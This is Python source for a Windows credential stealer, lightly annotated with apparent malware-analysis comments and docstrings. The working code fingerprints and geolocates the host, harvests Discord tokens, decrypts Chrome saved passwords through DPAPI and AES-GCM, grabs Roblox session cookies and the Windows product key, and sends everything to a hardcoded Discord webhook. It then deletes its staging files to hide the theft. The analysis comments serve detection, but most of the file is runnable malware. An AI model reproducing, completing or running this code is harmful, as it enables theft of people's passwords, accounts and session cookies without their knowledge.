1import psutil
2import platform
3import json
4from datetime import datetime
5from time import sleep
6import requests
7import socket
8from requests import get
9import os
10import re
11import requests
12import subprocess
13from uuid import getnode as get_mac
14import browser_cookie3 as steal, requests, base64, random, string, zipfile, shutil, dhooks, os, re, sys, sqlite3
15from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
16from cryptography.hazmat.primitives.ciphers.aead import AESGCM
17from cryptography.hazmat.backends import default_backend
18from Crypto.Cipher import AES
19
20
21from base64 import b64decode, b64encode
22from dhooks import Webhook, Embed, File
23from subprocess import Popen, PIPE
24from json import loads, dumps
25from shutil import copyfile
26from sys import argv
27
# CONFIG -> Setup before compiling
# NOTE(review): this file is a credential stealer (Discord tokens, Chrome saved
# logins, browser cookies, host fingerprint) that exfiltrates over a Discord
# webhook. Treat it as malware: analyse it only in an isolated VM with no network
# access, never on a workstation, and do not "fix" the broken parts.
# Exfiltration endpoint. A Discord webhook URL is a bearer credential: possession
# alone allows posting to it (and, as far as the Discord API is documented,
# deleting it). It is also the primary network IoC for this sample: outbound
# POSTs from a python process to discord.com/api/webhooks/874690460067717201/...
url= "https://discord.com/api/webhooks/874690460067717201/IxdKWFZooIu_qRAwIBXqn1ZGo5YW95fAVWYnDVvVGSmV2yMWjYkPj1jxqHZoSa9OoidW"

30
31
32
33
# Scaling from bytes to KB,MB,GB, etc
def scale(bytes, suffix="B"):
    """Format a byte count as a human-readable string such as ``1.50MB``.

    Repeatedly divides by 1024 until the value is below 1024 and returns it with
    two decimals and the matching unit prefix. The prefix table stops at "P",
    so for 1024**6 bytes or more the loop falls off the end and the function
    returns ``None``. The ``bytes`` parameter shadows the builtin and is
    rebound in place.
    """
    defined = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < defined:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= defined
41
uname = platform.uname()

bt = datetime.fromtimestamp(psutil.boot_time()) # Boot time

host = socket.gethostname()
localip = socket.gethostbyname(host)

# Host fingerprinting / geolocation, executed at import time before anything is
# stolen. Every call below is an unauthenticated outbound HTTP request with no
# timeout and no error handling, so an unreachable endpoint raises and aborts
# the script before the webhook is ever contacted. The hostnames are useful
# first-stage network indicators: api.ipify.org, ipapi.co (seven requests in a
# row), ip-api.com (plain HTTP).
publicip = get('https://api.ipify.org').text # Get public API
city = get(f'https://ipapi.co/{publicip}/city').text
region = get(f'https://ipapi.co/{publicip}/region').text
postal = get(f'https://ipapi.co/{publicip}/postal').text
timezone = get(f'https://ipapi.co/{publicip}/timezone').text
currency = get(f'https://ipapi.co/{publicip}/currency').text
country = get(f'https://ipapi.co/{publicip}/country_name').text
callcode = get(f"https://ipapi.co/{publicip}/country_calling_code").text
vpn = requests.get('http://ip-api.com/json?fields=proxy')
proxy = vpn.json()['proxy']  # ip-api's "proxy" flag, reported below as "Using VPN?"
mac = get_mac()  # uuid.getnode(); may be a random 48-bit value if no hardware address is found

60
61
roaming = os.getenv('AppData')
## Output for txt file location
# There is no path separator between %AppData% and "temp.txt", so the file
# actually created is "<...>\AppData\Roamingtemp.txt" (a sibling of the Roaming
# folder, not inside it). It is opened for append at import time and is never
# written to or closed anywhere in this file; its mere presence is a forensic
# artifact of this stealer. On non-Windows hosts os.getenv('AppData') is None
# and the concatenation raises TypeError, aborting the script.
output = open(roaming + "temp.txt", "a")
65
66
## Discord Locations
# Profile roots scanned for Discord tokens by the import-time loop below.
# Note the Chrome, Brave and Yandex entries are rooted in roaming AppData here,
# whereas beamed() and localdata() root the Chromium profiles in LOCALAPPDATA;
# with this table the loop will typically only match the Discord/Opera folders.
Directories = {
    'Discord': roaming + '\\Discord',
    'Discord Two': roaming + '\\discord',
    'Discord Canary': roaming + '\\Discordcanary',
    'Discord Canary Two': roaming + '\\discordcanary',
    'Discord PTB': roaming + '\\discordptb',
    'Google Chrome': roaming + '\\Google\\Chrome\\User Data\\Default',
    'Opera': roaming + '\\Opera Software\\Opera Stable',
    'Brave': roaming + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
    'Yandex': roaming + '\\Yandex\\YandexBrowser\\User Data\\Default',
}

79
80
## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
def Yoink(Directory: str):
    """Return every Discord-token-shaped string found in a profile's LevelDB.

    Appends ``\\Local Storage\\leveldb`` to ``Directory``, reads each ``.log``
    and ``.ldb`` file there as text (decode errors ignored) and collects all
    matches of the two token regexes (classic three-part tokens and ``mfa.``
    tokens). Unlike sniff() further down, there is no try/except: a missing
    leveldb folder or an unreadable file raises to the caller. The file
    objects opened inline are never explicitly closed.
    """
    Directory += '\\Local Storage\\leveldb'

    Tokens = []

    for FileName in os.listdir(Directory):
        if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for Token in re.findall(regex, line):
                    Tokens.append(Token)

    return Tokens
97
98
## Wipe the temp file
def Wipe():
    """Truncate the "<AppData>\\Roamingtemp.txt" artifact if it exists.

    Opens the file in write mode, writes an empty string and closes it. The
    ``else: pass`` branch is a no-op. Nothing in this file ever calls Wipe(),
    so the artifact is left in place.
    """
    if os.path.exists(roaming + "temp.txt"):
        output2 = open(roaming + "temp.txt", "w")
        output2.write("")
        output2.close()
    else:
        pass
107
108
## Search Directorys for Token regex if exists
# Import-time Discord token sweep over the Directories table. Each iteration
# overwrites ``realshit``, so only the LAST token found is reported; when no
# token is found ``realshit`` is never bound and the webhook POST below fails
# with NameError (uncaught) before beamed() runs. In practice the stage-1
# report is therefore only sent from hosts that have a Discord token on disk.
for Discord, Directory in Directories.items():
    if os.path.exists(Directory):
        Tokens = Yoink(Directory)
        if len(Tokens) > 0:
            for Token in Tokens:
                realshit = f"{Token}\n"

116
117
cpufreq = psutil.cpu_freq()
svmem = psutil.virtual_memory()
partitions = psutil.disk_partitions()
disk_io = psutil.disk_io_counters()
net_io = psutil.net_io_counters()

# Hardware fingerprint for the stage-1 report. ``partitions`` is fetched twice
# (harmless). The loop leaves ``partition_usage`` bound to the last mountpoint
# that could be read; if every mountpoint raises PermissionError the name is
# never bound and the POST below fails with NameError.
partitions = psutil.disk_partitions()
for partition in partitions:
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        continue
130
131
132
133
134
# Stage-1 exfiltration, executed at import time with no timeout and the
# response ignored: posts the geo/host/CPU/memory/disk/network fingerprint
# collected above plus the last Discord token found (``realshit``) to the
# webhook as a set of embeds. The literal embed title "Someone Runs Program!"
# and the misspelled field text ("MAC Adress", "Psychical cores",
# "Nemory Information") are handy strings for matching this family in
# webhook traffic or process memory.
requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})
136
DBP = r'Google\Chrome\User Data\Default\Login Data'  # Chrome saved-logins SQLite DB, relative to %LOCALAPPDATA%
ADP = os.environ['LOCALAPPDATA']  # KeyError (script aborts) on hosts without this variable
139
140
def sniff(path: str):
    """Collect Discord-token-shaped strings from ``path``'s LevelDB store.

    Same scan as Yoink() (``.log``/``.ldb`` files under ``\\Local Storage\\leveldb``,
    two token regexes), but wrapped in a bare ``except`` that swallows every
    error. On any exception the function returns ``None`` rather than an empty
    list, which makes the unguarded ``len(tokens)`` in beamed() raise TypeError.
    """
    path += '\\Local Storage\\leveldb'

    tokens = []
    try:
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue

            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens
    except:
        pass
157
158
def encrypt(cipher, plaintext, nonce):
    """AES-GCM encrypt ``plaintext`` with ``cipher`` under ``nonce``.

    Not called anywhere in this file. It assigns ``cipher.mode`` after the
    Cipher object was built with ``mode=None`` by rcipher(), which appears to
    depend on undocumented behaviour of the ``cryptography`` Cipher class.
    Only ``update()`` is called, never ``finalize()``, so no authentication
    tag is produced. Returns ``(cipher, ciphertext, nonce)``.
    """
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)
164
165
def decrypt(cipher, ciphertext, nonce):
    """AES-GCM decrypt ``ciphertext`` with ``cipher`` under ``nonce`` -- unauthenticated.

    Assigns ``cipher.mode`` on an existing Cipher (see encrypt()) and calls only
    ``decryptor.update()``; ``finalize()`` is never invoked, so the GCM tag is
    never verified. Whatever trailing tag bytes are passed in are treated as
    ciphertext and come back as 16 bytes of garbage at the end of the result;
    chrome.cdecrypt() relies on this and slices them off with ``[:-16]``.
    """
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)
170
171
def rcipher(key: bytes):
    """Build a ``cryptography`` AES Cipher for ``key`` with ``mode=None``.

    The mode is attached later by encrypt()/decrypt() via attribute assignment.
    ``key`` is the DPAPI-unwrapped Chrome key (see decryptions()).
    """
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher
175
176
def dpapi(encrypted: bytes) -> bytes:
    """Unwrap a DPAPI blob via ``crypt32.CryptUnprotectData`` and return the plaintext.

    Args:
        encrypted: raw DPAPI blob bytes (legacy Chrome password blob, or the
            wrapped AES key from Local State).

    Returns:
        The decrypted bytes, copied out of the output blob before ``LocalFree``.

    Raises:
        OSError (via ``ctypes.WinError``) when CryptUnprotectData returns 0;
        AttributeError on non-Windows hosts where ``ctypes.windll`` is absent.

    DPAPI user-scope blobs can typically only be unwrapped in the protecting
    user's security context, which is why this stealer has to run as the
    victim user rather than from a different account.
    """
    import ctypes
    import ctypes.wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [('cbData', ctypes.wintypes.DWORD),
                    ('pbData', ctypes.POINTER(ctypes.c_char))]

    p = ctypes.create_string_buffer(encrypted, len(encrypted))
    blobin = DATA_BLOB(ctypes.sizeof(p), p)
    blobout = DATA_BLOB()
    retval = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(blobin), None, None, None, None, 0, ctypes.byref(blobout))
    if not retval:
        raise ctypes.WinError()
    result = ctypes.string_at(blobout.pbData, blobout.cbData)
    ctypes.windll.kernel32.LocalFree(blobout.pbData)
    return result
195
196
def localdata() -> str:
    """Return the base64 ``os_crypt.encrypted_key`` from Chrome's Local State file.

    Reads only the FIRST line of %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local
    State and parses it as JSON, so it presumes the whole file is single-line
    JSON (json.loads raises otherwise -- confirm against the target build).
    The returned key is the DPAPI-wrapped AES key used for ``v10`` password
    blobs; decryptions() unwraps it.
    """
    jsn = None
    with open(os.path.join(os.environ['LOCALAPPDATA'], r"Google\Chrome\User Data\Local State"), encoding='utf-8', mode="r") as f:
        jsn = json.loads(str(f.readline()))
    return jsn["os_crypt"]["encrypted_key"]
202
203
def decryptions(encrypted_txt: bytes) -> bytes:
    """Decrypt a Chrome ``v10`` password blob with the Local State AES key.

    Blob layout assumed by the slicing below: bytes 0-2 are the ``v10``
    prefix, 3-15 the 12-byte GCM nonce, 15.. the ciphertext followed by the
    16-byte tag. The Local State key is base64-decoded and its first five
    bytes (a marker prefix, not validated here) are dropped before
    CryptUnprotectData unwraps it. Because decrypt() never finalizes, the
    returned bytes are unauthenticated and still carry 16 trailing tag bytes;
    chrome.cdecrypt() strips them.
    """
    encoded_key = localdata()
    encrypted_key = base64.b64decode(encoded_key.encode())
    encrypted_key = encrypted_key[5:]
    key = dpapi(encrypted_key)
    nonce = encrypted_txt[3:15]
    cipher = rcipher(key)
    return decrypt(cipher, encrypted_txt[15:], nonce)
212
213
class chrome:
    """Dump Chrome's saved logins (Login Data) to C:\\ProgramData\\passwords.txt.

    chromedb() copies the SQLite DB to %LOCALAPPDATA%\\sqlite_file (presumably
    to sidestep Chrome's lock on the live file), pwsd() reads
    signon_realm/username_value/password_value from the ``logins`` table,
    cdecrypt() decrypts each password via DPAPI (legacy ``\\x01\\x00\\x00\\x00``
    blobs) or AES-GCM with the DPAPI-wrapped Local State key (``v10`` blobs),
    and saved() writes the plaintext list to disk for beamed() to zip and send.
    Host artifacts: %LOCALAPPDATA%\\sqlite_file (transient) and
    C:\\ProgramData\\passwords.txt (plaintext credentials in a machine-wide
    directory that is readable by all local users by default).
    """
    def __init__(self):
        # Formatted "[===] hostname/login/value" entries, one per decrypted row.
        self.passwordList = []

    def chromedb(self):
        """Copy the Login Data DB to a temp path and parse it with pwsd()."""
        _full_path = os.path.join(ADP, DBP)
        _temp_path = os.path.join(ADP, 'sqlite_file')
        if os.path.exists(_temp_path):
            os.remove(_temp_path)
        shutil.copyfile(_full_path, _temp_path)
        self.pwsd(_temp_path)
    def pwsd(self, db_file: str) -> None:
        """Read every row of ``logins`` from ``db_file``, decrypt it and record it.

        Rows whose realm starts with ``android`` are skipped. The temp DB is
        deleted after the connection is closed. Decryption errors other than
        OSError (e.g. a UnicodeDecodeError from ``.decode()``) propagate.
        """
        conn = sqlite3.connect(db_file)
        _sql = 'select signon_realm,username_value,password_value from logins'
        for row in conn.execute(_sql):
            host = row[0]
            if host.startswith('android'):
                continue
            name = row[1]
            value = self.cdecrypt(row[2])
            _info = '[==================]\nhostname => : %s\nlogin => : %s\nvalue => : %s\n[==================]\n\n' % (host, name, value)
            self.passwordList.append(_info)
        conn.close()
        os.remove(db_file)

    def cdecrypt(self, encrypted_txt: bytes):
        """Return the plaintext password for a Chrome password blob, or None.

        Dispatches on the blob prefix: DPAPI for the legacy 4-byte header,
        decryptions() for ``v10`` (the unauthenticated GCM tail is cut with
        ``[:-16]``). Returns None on OSError (``WindowsError``), on an
        unrecognised prefix, and unconditionally on non-win32 platforms.
        """
        if sys.platform == 'win32':
            try:
                if encrypted_txt[:4] == b'\x01\x00\x00\x00':
                    decrypted_txt = dpapi(encrypted_txt)
                    return decrypted_txt.decode()
                elif encrypted_txt[:3] == b'v10':
                    decrypted_txt = decryptions(encrypted_txt)
                    return decrypted_txt[:-16].decode()
            except WindowsError:
                return None
        else:
            pass

    def saved(self):
        """Write the collected entries to C:\\ProgramData\\passwords.txt (best effort)."""
        try:
            with open(r'C:\ProgramData\passwords.txt', 'w', encoding='utf-8') as f:
                f.writelines(self.passwordList)
        except WindowsError:
            return None
259
260
# Chrome credential dump, only when run as a script. Note this guard protects
# only these lines: the fingerprinting, stage-1 POST and beamed() above/below
# all run at import time regardless of __name__. Any failure inside chromedb()
# is silently swallowed; saved() then writes whatever was collected.
if __name__ == "__main__":
    main = chrome()
    try:
        main.chromedb()
    except:
        pass
    main.saved()
268
269
270# webhook functionality => collect rest of specified data, send it to our webhook
271
272
def beamed():
    """Stage-2 collection and exfiltration; called unconditionally at import.

    Gathers, in order: the public IP (stored, misleadingly, in ``hostname``),
    Discord tokens from the LevelDB stores in ``paths`` via sniff(), a zip of
    C:\\ProgramData\\passwords.txt (written earlier by chrome.saved()), the
    Windows product key and OS caption via two ``wmic`` child processes, and
    Chrome/Firefox cookies (browser_cookie3) filtered for ``.ROBLOSECURITY``.
    Everything is posted as one embed plus the zip attachment to the webhook
    in ``url``; the files under C:\\ProgramData are then deleted via
    os.system ``del``.

    Defensive notes, all visible in the body:
    - Host artifacts: C:\\ProgramData\\screenshot.jpg, passwords.txt and
      passwords.zip (deleted at the end, so expect to recover them only from
      filesystem journals or deleted-file carving).
    - Process artifacts: a python process spawning ``wmic`` with
      ``OA3xOriginalProductKey`` / ``os get Caption``, and shell ``del``
      commands; reads of browser profile and cookie databases.
    - Every step sits in a bare ``except: pass``. If ``keys``/``types`` (wmic
      failed), ``roblox`` (cookie filtering raised) or ``passwords``
      (passwords.txt absent) ends up unbound, Embed construction or
      hook.send raises NameError, is swallowed, and nothing is sent.
    - ``image`` is never imported or defined in this file, so the screenshot
      block always raises and is skipped; no screenshot is ever taken.
    - ``len(tokens)`` is outside any try: sniff() returns None on error,
      which raises TypeError here and aborts the function.
    - The loop variable ``platform`` shadows the imported module inside
      this function.
    """
    hook = Webhook(url)
    try:
        hostname = requests.get("https://api.ipify.org").text
    except:
        pass


    local = os.getenv('LOCALAPPDATA')
    roaming = os.getenv('APPDATA')
    paths = {
        'Discord': roaming + '\\Discord',
        'Discord Canary': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
    }

    message = '\n'
    for platform, path in paths.items():
        if not os.path.exists(path):
            continue

        message += '```'

        tokens = sniff(path)

        if len(tokens) > 0:
            for token in tokens:
                message += f'{token}\n'
        else:
            pass

        message += '```'


    """screenshot victim's desktop"""
    # ``image`` is not defined anywhere in this file -> always falls into except.
    try:
        screenshot = image.grab()
        screenshot.save(os.getenv('ProgramData') +r'\screenshot.jpg')
        screenshot = open(r'C:\ProgramData\screenshot.jpg', 'rb')
        screenshot.close()
    except:
        pass

    """gather our .zip variables"""
    # ``passwords`` stays unbound if passwords.txt does not exist.
    try:
        zname = r'C:\ProgramData\passwords.zip'
        newzip = zipfile.ZipFile(zname, 'w')
        newzip.write(r'C:\ProgramData\passwords.txt')
        newzip.close()
        passwords = File(r'C:\ProgramData\passwords.zip')
    except:
        pass

    """gather our windows product key variables"""
    # Two wmic child processes; a good EDR detection point for this sample.
    try:
        usr = os.getenv("UserName")
        keys = subprocess.check_output('wmic path softwarelicensingservice get OA3xOriginalProductKey').decode().split('\n')[1].strip()
        types = subprocess.check_output('wmic os get Caption').decode().split('\n')[1].strip()
    except:
        pass

    """steal victim's .roblosecurity cookie"""
    cookie = [".ROBLOSECURITY"]
    cookies = []
    limit = 2000

    """chrome installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.chrome()))
    except:
        pass

    """firefox installation => list cookies from this location"""
    try:
        cookies.extend(list(steal.firefox()))
    except:
        pass

    """read data => if we find a matching positive for our specified variable 'cookie', send it to our webhook."""
    # Only the last 2000-char chunk survives in ``roblox``; earlier chunks are overwritten.
    try:
        for y in cookie:
            send = str([str(x) for x in cookies if y in str(x)])
            chunks = [send[i:i + limit] for i in range(0, len(send), limit)]
            for z in chunks:
                roblox = f'```' + f'{z}' + '```'
    except:
        pass

    """attempt to send all recieved data to our specified webhook"""
    try:
        embed = Embed(title='Aditional Features',description='a victim\'s data was extracted, here\'s the details:',color=0x2f3136,timestamp='now')
        embed.add_field("windows key:",f"user => {usr}\ntype => {types}\nkey => {keys}")
        embed.add_field("roblosecurity:",roblox)
        embed.add_field("tokens:",message)
        embed.add_field("hostname:",f"{hostname}")
    except:
        pass
    try:
        hook.send(embed=embed, file=passwords)
    except:
        pass

    """attempt to remove all evidence, allows for victim to stay unaware of data extraction"""
    # Anti-forensics: shell ``del`` of the staging files (the Roamingtemp.txt
    # and sqlite_file artifacts created elsewhere are not cleaned up here).
    try:
        subprocess.os.system(r'del C:\ProgramData\screenshot.jpg')
        subprocess.os.system(r'del C:\ProgramData\passwords.zip')
        subprocess.os.system(r'del C:\ProgramData\passwords.txt')
    except:
        pass
386
387
# Stage-2 exfiltration fires on import as well as on direct execution; it is
# not behind the __name__ guard, so merely importing this module runs it.
beamed()